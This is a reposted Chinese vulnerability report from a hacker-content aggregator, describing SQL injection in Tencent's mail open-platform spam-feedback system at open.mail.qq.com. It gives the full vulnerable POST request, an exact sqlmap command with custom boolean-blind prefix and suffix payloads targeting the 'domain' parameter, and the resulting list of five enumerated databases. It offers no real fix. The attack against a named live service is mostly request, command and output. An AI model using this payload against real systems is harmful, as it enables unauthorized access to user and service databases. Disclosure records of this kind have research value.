记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

腾讯邮箱开放平台某SQL注入

2015-10-17 06:10

腾讯邮箱开放平台

垃圾邮件举报反馈系统处

添加域名,然后删除链接处存在SQL注入



code 区域
POST /cgi-bin/feedback_loop?sid=DIBFyfQ1kYxvlhhN&t=open_feedback_2&action=delDomain&fb_status=home&fb_page=1& HTTP/1.1

Host: open.mail.qq.com

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,zh-HK;q=0.6,en-US;q=0.4,en;q=0.2

Accept-Encoding: gzip, deflate

Cookie: cookie

Connection: keep-alive

Content-Length: 58

Content-Type: application/x-www-form-urlencoded



domain=qq.com&seg=1&ef=js





domain 参数

漏洞证明:

1.png





2.png





python sqlmap.py -r 1.txt -p domain --prefix "' and 1=if((1=1" --suffix "),1,(select 1 union select 2)) and ''='" --dbms=mysql --technique=B --dbs



code 区域
available databases [5]:

[*] domain_interflow

[*] feedbackloop

[*] information_schema

[*] mysql

[*] test

修复方案:

您懂得

知识来源: www.wooyun.org/bugs/wooyun-2015-0138114

阅读:189039 | 评论:0 | 标签:注入

想收藏或者和大家分享这篇好文章→复制链接地址

“腾讯邮箱开放平台某SQL注入”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

九层之台,起于累土;黑客之术,始于阅读

推广

工具

标签云

本页关键词